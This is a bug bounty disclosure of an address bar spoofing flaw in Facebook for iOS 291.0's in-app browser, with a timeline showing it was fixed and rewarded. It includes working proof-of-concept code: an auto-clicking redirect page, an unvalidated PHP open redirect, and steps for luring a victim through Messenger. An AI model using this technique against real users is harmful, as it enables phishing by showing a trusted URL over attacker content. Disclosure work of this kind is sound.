There is an inconsistency in the way Facebook iOS Inbox which uses WebView component renders some web page redirections in a way that allows an attacker to perform address bar spoofing, resulting in an HTTPS URL being displayed with the content from some other web site., To demonstrate I have created javascript that automatically clicks on link for performing redirection to invalid port to make delay in response so browser is displaying content from attackers site without updating back to initiator page from non responsive.
Affected version:
App version: Facebook for iOS 291.0
Setup:
Created two files and host it on server:
1. red.php :
<html>
<head>
<title>Instagram</title>
</head>
<body>
<a href="/loc.php?url=https://instagram.com:1234/"></a>
<script>
document.querySelector("a").click();
</script>
<div id="1"><font size="15">FBInbox : Rahul Kankrale</font></div>
</body>
</html>
2. loc.php:
<?php
$loc = $_GET["url"];
header("Location:$loc");
?>
Steps to reproduce:
1. Send https://servicenger.com/red123.php to victim in message
2. Copy thread link by going on m.facebook.com > victim thread which is like https://m.facebook.com/messages/read/?tid
3. Paste copied url on victim’s wall
4. As victim using Facebook for iOS click on link posted by attacker so it opens messages in Facebook app itself
5. click on https://servicenger.com/red123.php from opens thread
6. It will immediately show instagram.com as address bar and content from Servicenger.com
Proof of concept :
Timeline:
10/10/2020: Submitted
10/10/2020: Triaged
28/10/2020: Fixed & Rewarded $1500